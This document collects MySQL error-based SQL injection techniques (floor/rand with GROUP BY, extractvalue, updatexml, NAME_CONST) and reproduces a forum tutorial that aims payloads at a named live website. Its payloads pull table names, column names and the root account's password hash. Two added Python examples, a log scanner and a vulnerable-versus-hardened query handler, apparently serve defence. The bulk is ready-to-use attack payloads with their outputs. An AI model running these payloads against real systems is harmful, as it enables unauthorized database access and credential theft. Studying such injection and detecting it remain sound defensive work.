1. Error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Example:

First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To read other data, replace the version() expression with the subquery you need. For example, to query the admin username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
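All four techniques collected above (floor(rand(0)*2) with GROUP BY, extractvalue(), updatexml() and a doubled name_const()) leave recognisable signatures in web server access logs. The scanner below is an added example, not part of the original post; the combined-log format, the function names and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Request-line parser for Apache/Nginx combined-style access logs (assumed format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(query: str) -> list[str]:
    """Name the MySQL error-based techniques whose signature appears in a query string."""
    q = unquote_plus(query).lower()          # decode '+' and %xx the way the server would
    q = re.sub(r"/\*.*?\*/", " ", q)          # drop inline comments used to split keywords
    hits = []
    if re.search(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", q) and re.search(r"group\s+by", q):
        hits.append("floor_rand_groupby")    # yields "Duplicate entry ... for key 'group_key'"
    if re.search(r"extractvalue\s*\(", q):
        hits.append("extractvalue")          # yields "XPATH syntax error: '<data>'"
    if re.search(r"updatexml\s*\(", q):
        hits.append("updatexml")
    if len(re.findall(r"name_const\s*\(", q)) >= 2:
        hits.append("name_const_duplicate")  # yields "Duplicate column name '<data>'"
    return hits

def scan_log(lines) -> list[tuple[str, int, list[str]]]:
    """Return (client_ip, status, techniques) for each request matching a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, target, status = m.groups()
        techniques = classify(target.partition("?")[2])
        if techniques:
            findings.append((ip, int(status), techniques))
    return findings

# Constructed sample log lines; the payload shapes mirror the ones quoted above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /qcwh/content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /qcwh/content/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 312',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user()))) HTTP/1.1" 500 288',
    '10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 301',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /article.php?id=1+and+1=(updatexml(1,concat(0x3a,(select+user())),1)) HTTP/1.1" 500 290',
]

if __name__ == "__main__":
    for ip, status, techniques in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} techniques={','.join(techniques)}")
```

A run of 5xx responses paired with any of these signatures from one client is the pattern worth alerting on, since every technique here needs the database error to be reflected back.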
Error-based injection on newer MySQL versions: injection via NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|------|
| TEST |
|------|
|    1 |
|------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out of this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading..
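Every technique on this page, from the floor() duplicate-key trick to the NAME_CONST duplicate-column trick, reads data back through a raw database error that the page echoes to the client. As an added defender-side example (not from the original post or the quoted tutorial), here is a Python stand-in for a detail.php?id= handler showing the injectable concatenation pattern beside its hardened form; the article table, the function names and the use of sqlite3 in place of MySQL are assumptions, so the MySQL-only functions fail here with a different error text, but the vulnerable path still hands that text to the client.

```python
import sqlite3
import logging

# In-memory stand-in for the article table from the mysql session above (constructed data).
conn = sqlite3.connect(":memory:")
conn.execute("create table article (id integer primary key, title text, content text)")
conn.execute("insert into article values (1, 'test', 'do it')")
conn.commit()

logger = logging.getLogger("app")

def lookup_article_vulnerable(raw_id: str) -> dict:
    """Mirrors the injectable pattern: the parameter is spliced into the SQL text and the
    raw database error is returned to the client, which is the channel every technique
    on this page reads data back through."""
    try:
        row = conn.execute(f"select * from article where id = {raw_id}").fetchone()
        return {"status": 200, "row": row}
    except sqlite3.Error as e:
        return {"status": 500, "error": str(e)}      # verbose DB error reaches the client

def lookup_article_hardened(raw_id: str) -> dict:
    """Hardened form: strict type check, bound parameter, generic error for the client."""
    if not raw_id.isdigit():
        return {"status": 400, "error": "invalid id"}
    try:
        row = conn.execute("select * from article where id = ?", (int(raw_id),)).fetchone()
        return {"status": 200, "row": row}
    except sqlite3.Error:
        logger.exception("article lookup failed")    # detail stays in server-side logs
        return {"status": 500, "error": "internal error"}

if __name__ == "__main__":
    payload = "1 and extractvalue(1,concat(0x5c,(select 1)))"   # constructed probe
    print(lookup_article_vulnerable(payload))   # leaks the database's own error text
    print(lookup_article_hardened(payload))     # rejected before any SQL is built
```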